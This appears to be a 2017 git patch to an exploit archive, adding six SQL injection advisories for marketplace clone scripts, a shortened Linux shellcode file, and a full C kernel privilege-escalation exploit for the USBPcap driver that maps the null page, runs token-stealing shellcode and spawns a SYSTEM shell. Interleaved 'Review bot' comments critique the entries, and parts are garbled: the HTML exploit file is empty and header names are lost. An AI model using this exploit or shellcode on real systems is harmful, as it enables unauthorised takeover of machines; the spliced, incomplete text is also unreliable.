From 06a7933be47ef3038a9d60d35fecb054787e615b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 9 Mar 2017 05:01:19 +0000 Subject: [PATCH] DB: 2017-03-09 8 new exploits USBPcap - Privilege Escalation Linux - Reverse Shell Shellcode (66 bytes) Linux - Reverse Shell Shellcode (65 bytes) Themeforest Clone Script - SQL Injection Graphicriver Clone Script - SQL Injection Codecanyon Clone Script - SQL Injection Audiojungle Clone Script - SQL Injection Videohive Clone Script - SQL Injection Envato Clone Script - SQL Injection Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery --- files.csv | 10 +- platforms/linux/shellcode/41398.nasm | 63 +++---- platforms/multiple/webapps/41554.html | 249 ++++++++++++++++++++++++++ platforms/php/webapps/41548.txt | 17 ++ platforms/php/webapps/41549.txt | 18 ++ platforms/php/webapps/41550.txt | 17 ++ platforms/php/webapps/41551.txt | 17 ++ platforms/php/webapps/41552.txt | 17 ++ platforms/php/webapps/41553.txt | 22 +++ platforms/windows/local/41542.c | 222 +++++++++++++++++++++++ 10 files changed, 608 insertions(+), 44 deletions(-) create mode 100755 platforms/multiple/webapps/41554.html create mode 100755 platforms/php/webapps/41548.txt create mode 100755 platforms/php/webapps/41549.txt create mode 100755 platforms/php/webapps/41550.txt create mode 100755 platforms/php/webapps/41551.txt create mode 100755 platforms/php/webapps/41552.txt create mode 100755 platforms/php/webapps/41553.txt create mode 100755 platforms/windows/local/41542.c diff --git a/files.csv b/files.csv index 692960480..84517b257 100644 --- a/files.csv +++ b/files.csv 
@@ -8826,6 +8826,7 @@ id,file,description,date,author,platform,type,port
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
+41542,platforms/windows/local/41542.c,"USBPcap - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15925,7 +15926,7 @@ id,file,description,date,author,platform,type,port
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
-41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
+41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
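Review bot: The updated 41398 row still calls the file `Linux - Reverse Shell Shellcode (65 bytes)`, but the 41398.nasm hunk in this same patch deletes the socket/connect/dup2 stages and leaves an execve("/bin//sh") stub whose own comment says `; 22 bytes, zero nulls` — and the encodings do sum to 22 (xor esi,esi 2, mul esi 2, push rax 1, mov rbx,imm64 10, push rbx 1, push rsp 1, pop rdi 1, mov al,59 2, syscall 2). Anyone filtering the index on "reverse shell" or on size will pick up an entry that is neither; the description should track the file, e.g. `41398,platforms/linux/shellcode/41398.nasm,"Linux/x86-64 - execve(/bin//sh) Shellcode (22 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0`, or the .nasm change should be reverted if the 65-byte figure refers to a version not in this patch. The row's platform column stays `linux` while the code uses rax/rbx/rsp; the neighbouring 41439 row handles that by naming `x86-64` in the title, which the suggested text follows.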
@@ -37461,3 +37462,10 @@ id,file,description,date,author,platform,type,port
 41543,platforms/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
 41544,platforms/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
 41546,platforms/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,aix,webapps,0
+41548,platforms/php/webapps/41548.txt,"Themeforest Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41549,platforms/php/webapps/41549.txt,"Graphicriver Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41550,platforms/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41551,platforms/php/webapps/41551.txt,"Audiojungle Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41552,platforms/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41553,platforms/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41554,platforms/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",multiple,webapps,0
diff --git a/platforms/linux/shellcode/41398.nasm b/platforms/linux/shellcode/41398.nasm
index 73400add3..5e699caad 100755
--- a/platforms/linux/shellcode/41398.nasm
+++ b/platforms/linux/shellcode/41398.nasm
@@ -20,52 +20,29 @@ ;from, out of or in connection with the software or the use or other ;dealings in the Software. ; -; For a detailed explanation of this shellcode see my blog post: -; http://a41l4.blogspot.ca/2017/02/assignment-2b.html +; For a detailed explanation of this shellcode see my blog post: +; http://a41l4.blogspot.fr/2017/02/assignment-2b.html +; 22 bytes, zero nulls +global _start -global _start section .text + _start: -; Socket - push 41 - pop rax - push 2 - pop rdi - push 1 - pop rsi - cdq - syscall -; Connect - xchg edi, eax - push rdx - mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002 - not rbx - push rbx - mov al, 42 - push rsp - pop rsi - mov dl, 16 - syscall -; Dup 2 - push 3 - pop rsi -dup2loop: - mov al, 33 - dec esi - syscall - loopnz dup2loop -; Execve - ; rax and rsi are zero from the result of the last dup2 syscall and loop - push rax ; zero terminator for the following string that we are pushing - - mov rbx, '/bin//sh' - push rbx - - ; store /bin//sh address in RDI - push rsp - pop rdi + ; zeros RAX, RDX and RSI with only 4 bytes of machine code + xor esi,esi + mul esi - cdq ; zero rdx + ; null terminator for the following string + push rax + ; push /bin//sh in reverse + mov rbx,'/bin//sh' + push rbx + + ; store /bin//sh address in RDI, points at string + push rsp + pop rdi + + ; Call the Execve syscall mov al, 59 - syscall + syscall \ No newline at end of file diff --git a/platforms/multiple/webapps/41554.html b/platforms/multiple/webapps/41554.html new file mode 100755 index 000000000..711ca06b1 --- /dev/null +++ b/platforms/multiple/webapps/41554.html @@ -0,0 +1,249 @@ + + + + + +
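Review bot: The new body is a bare execve("/bin//sh", NULL, NULL) stub — `xor esi,esi` / `mul esi` zero RAX, RDX and RSI, `push rax` / `push rbx` / `push rsp` / `pop rdi` build the path pointer, `mov al, 59` / `syscall` invoke it — and every socket, connect and dup2 instruction is removed, so nothing in this file produces a reverse shell any more, yet the `assignment-2b` blog link is kept and the files.csv row for 41398 in this same patch still reads `Reverse Shell Shellcode (65 bytes)`. Either restore the network stages or state the new contract where `_start:` begins, e.g. `; execve("/bin//sh", argv=NULL, envp=NULL) only - no socket/connect/dup2 stage; pair with a stager`, so nobody deploys it expecting a callback. The `; 22 bytes, zero nulls` claim checks out against the encodings (2+2+1+10+1+1+1+2+2, and the imm64 for '/bin//sh' has no zero byte), but a NULL argv is a Linux-specific convenience: it is non-portable and kernels from 5.18 on reportedly warn on an empty argv, so a two-entry argv is worth the few extra bytes if this is reused. The licence header before old line 20 is outside this hunk.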
+ +
+ + + +
\ No newline at end of file
diff --git a/platforms/php/webapps/41548.txt b/platforms/php/webapps/41548.txt
new file mode 100755
index 000000000..bd18d6f14
--- /dev/null
+++ b/platforms/php/webapps/41548.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Themeforest Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://themeforestclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/marketplus/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41549.txt b/platforms/php/webapps/41549.txt
new file mode 100755
index 000000000..2f1f765ba
--- /dev/null
+++ b/platforms/php/webapps/41549.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Graphicriver Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://graphicriverclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/graphicriverclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41550.txt b/platforms/php/webapps/41550.txt
new file mode 100755
index 000000000..9a28f202a
--- /dev/null
+++ b/platforms/php/webapps/41550.txt
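Review bot: Both advisories in this hunk reduce to the single line `http://localhost/[PATH]/LastAdded/?by=[SQL]` with `Version: N/A` and no payload or observed response, so nothing here lets a reader confirm the injection or tell which release is affected; record at least one concrete probe and its effect, e.g. `?by=1 AND 1=1` versus `?by=1 AND 1=2` yielding different listings, or the SQL error text, plus the script version taken from the demo footer or package. The Themeforest and Graphicriver entries are word-for-word identical apart from the product URLs (same vendor, same `LastAdded/?by=` endpoint), which suggests one shared codebase; saying so would let defenders fix every bsetec clone script at once instead of per product. `Tested on: Win7 x64, Kali Linux x64` describes the attacker's machines, not the target stack (web server, PHP and MySQL versions), which is what is needed to judge exploitability.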
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Codecanyon Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://codecanyonclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/codecanyonclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41551.txt b/platforms/php/webapps/41551.txt
new file mode 100755
index 000000000..729a145b2
--- /dev/null
+++ b/platforms/php/webapps/41551.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Audiojungle Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://audiojungleclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/audiojungleclone
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41552.txt b/platforms/php/webapps/41552.txt
new file mode 100755
index 000000000..a1e2d4c38
--- /dev/null
+++ b/platforms/php/webapps/41552.txt
@@ -0,0 +1,17 @@
+# # # # #
+# Exploit Title: Videohive Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://videohiveclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/videohiveclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41553.txt b/platforms/php/webapps/41553.txt
new file mode 100755
index 000000000..b5f1d57cf
--- /dev/null
+++ b/platforms/php/webapps/41553.txt
@@ -0,0 +1,22 @@
+# # # # #
+# Exploit Title: Envato Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://envatoclone.bsetec.com/
+# Demo: http://bsetecdemo.com/envatoclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/codes/php-scripts/?by=[SQL]
+# http://localhost/[PATH]/graphics/graphics/?by=[SQL]
+# http://localhost/[PATH]/themes/word-press/?by=[SQL]
+# http://localhost/[PATH]/audios/music/?by=[SQL]
+# # # # #
+
+
diff --git a/platforms/windows/local/41542.c b/platforms/windows/local/41542.c
new file mode 100755
index 000000000..2c78ad76f
--- /dev/null
+++ b/platforms/windows/local/41542.c
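Review bot: All four URLs inject through the same `by` query parameter on different category listings (`codes/php-scripts`, `graphics/graphics`, `themes/word-press`, `audios/music`), which points to one shared listing routine rather than four separate bugs; the advisory should say so and name the sink if known, otherwise a vendor patching one route will leave the others open. Given its name and position, `by` is presumably an ORDER BY column or sort direction; if that is confirmed, the correct fix is an allow-list mapping accepted values to fixed SQL fragments, because ORDER BY identifiers cannot be supplied as bound parameters in a prepared statement. As written (`?by=[SQL]`, `Version: N/A`) there is no payload, response or version to reproduce against; one request/response pair per endpoint — or a statement that the remaining three behave identically — would make the entry verifiable.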
@@ -0,0 +1,222 @@ +/* + +Exploit Title - USBPcap Null Pointer Dereference Privilege Escalation +Date - 07th March 2017 +Discovered by - Parvez Anwar (@parvezghh) +Vendor Homepage - http://desowin.org/usbpcap/ +Tested Version - 1.1.0.0 (USB Packet capture for Windows bundled with WireShark 2.2.5) +Driver Version - 1.1.0.0 - USBPcap.sys +Tested on OS - 32bit Windows 7 SP1 +CVE ID - CVE-2017-6178 +Vendor fix url - not yet +Fixed Version - 0day +Fixed driver ver - 0day + + +USBPcap.sys +----------- + +.text:992AF494 loc_992AF494: +.text:992AF494 mov ecx, [edi+8] ; DeviceObject +.text:992AF494 +.text:992AF497 inc byte ptr [esi+23h] +.text:992AF49A add dword ptr [esi+60h], 24h +.text:992AF49E mov edx, esi ; Irp +.text:992AF4A0 call ds:IofCallDriver ; IofCallDriver function called without validating values !!! +.text:992AF4A6 push 18h ; RemlockSize +.text:992AF4A8 push esi ; Tag +.text:992AF4A9 push ebx ; RemoveLock +.text:992AF4AA mov edi, eax +.text:992AF4AC call ds:IoReleaseRemoveLockEx +.text:992AF4B2 mov eax, edi + + + +kd> u nt!IofCallDriver +. +. +. +82a7111b eb0c jmp nt!IofCallDriver+0x63 (82a71129) +82a7111d 8b4608 mov eax,dword ptr [esi+8] ds:0023:00000008=???????? 
<------------ null pointer dereference +82a71120 52 push edx +82a71121 0fb6c9 movzx ecx,cl +82a71124 56 push esi +82a71125 ff548838 call dword ptr [eax+ecx*4+38h] <------------ control flow of execution +82a71129 5e pop esi +82a7112a 59 pop ecx +82a7112b 5d pop ebp +82a7112c c3 ret + + +*/ + + + +#include +#include + +#define BUFSIZE 4096 + + +typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)( + IN HANDLE ProcessHandle, + IN OUT PVOID *BaseAddress, + IN ULONG ZeroBits, + IN OUT PULONG RegionSize, + IN ULONG AllocationType, + IN ULONG Protect); + + + +// Windows 7 SP1 + +#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct +#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct +#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct +#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct + + +BYTE token_steal_w7[] = +{ + 0x60, // pushad Saves all registers + 0x64,0xA1,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD + 0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS + 0x8b,0xc8, // mov ecx, eax Current _EPROCESS structure + 0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN + 0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks + 0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks + 0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process) + 0x75,0xe8, // jne ---- + 0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX + 0x89,0x91,0xF8,0x00,0x00,0x00, // mov [ecx+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS + 0x61, // popad Restores all registers + 0x83,0xc4,0x18, // add esp,18 + 0xc3 // ret +}; + + + + + +void spawnShell() +{ + STARTUPINFOA si; + PROCESS_INFORMATION pi; + + + 
ZeroMemory(&pi, sizeof(pi)); + ZeroMemory(&si, sizeof(si)); + si.cb = sizeof(si); + + si.cb = sizeof(si); + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_SHOWNORMAL; + + if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); + return; + } + + CloseHandle(pi.hThread); + CloseHandle(pi.hProcess); +} + + + +int main(int argc, char *argv[]) +{ + + _NtAllocateVirtualMemory NtAllocateVirtualMemory; + LPVOID addrtoshell; + NTSTATUS allocstatus; + LPVOID base_addr = (LPVOID)0x00000001; + DWORD written; + int rwresult; + int size = BUFSIZE; + HANDLE hDevice; + DWORD dwRetBytes = 0; + unsigned char buffer[BUFSIZE]; + unsigned char devhandle[MAX_PATH]; + + + + printf("-------------------------------------------------------------------------------\n"); + printf(" USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit \n"); + printf(" Tested on Windows 7 SP1 (32bit) \n"); + printf("-------------------------------------------------------------------------------\n\n"); + + + sprintf(devhandle, "\\\\.\\%s", "usbpcap1"); + + addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if(addrtoshell == NULL) + { + printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError()); + return -1; + } + printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell); + + memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7)); + printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7)); + + NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); + + if (!NtAllocateVirtualMemory) + { + printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); + return -1; + } + + printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory); + printf("[+] Allocating memory at [0x%p]\n", base_addr); + + allocstatus = 
NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + if (allocstatus) + { + printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError()); + return -1; + } + printf("[+] NtAllocateVirtualMemory successful\n"); + + memset(buffer, 0x00, BUFSIZE); + memcpy(buffer+0x0000006b, &addrtoshell, 4); + + rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); + + if (rwresult == 0) + { + printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); + return -1; + } + printf("[+] WriteProcessMemory %d bytes written\n", written); + + printf("[+] Device handle %s\n", devhandle); + + hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if (hDevice == INVALID_HANDLE_VALUE) + { + printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); + return -1; + } + else + { + printf("[+] Open %s device successful\n", devhandle); + } + + printf("[~] Press any key to send Exploit . . .\n"); + getch(); + + DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL); + + CloseHandle(hDevice); + + printf("[+] Spawning SYSTEM Shell\n"); + spawnShell(); + + return 0; +} +
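Review bot: `DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL)` at the end of main() discards its return value and `spawnShell()` runs unconditionally, so if the IOCTL never reaches the vulnerable IofCallDriver path (a different USBPcap build, or the filter device is not `\\.\usbpcap1` on this host) the user is handed an ordinary cmd.exe under the banner `Spawning SYSTEM Shell`; at minimum log the result, `if (!DeviceIoControl(...)) printf("[-] DeviceIoControl failed (%d)\n", GetLastError());`, and ideally open the current token and compare its user SID to S-1-5-18 before spawning. The control device name is fixed by `sprintf(devhandle, "\\\\.\\%s", "usbpcap1")`; USBPcap presumably exposes one such device per USB root hub, so retrying `usbpcap1..usbpcapN` until CreateFile succeeds would make the PoC less brittle. As rendered, the two `#include` directives have lost their header names — the code needs windows.h, stdio.h and conio.h (for `getch`) to build; confirm against the original file. `Fixed Version - 0day` reflects the submission date; readers should check the vendor changelog for CVE-2017-6178 before treating current builds as affected, and the header already limits the null-page mapping technique to 32-bit Windows 7.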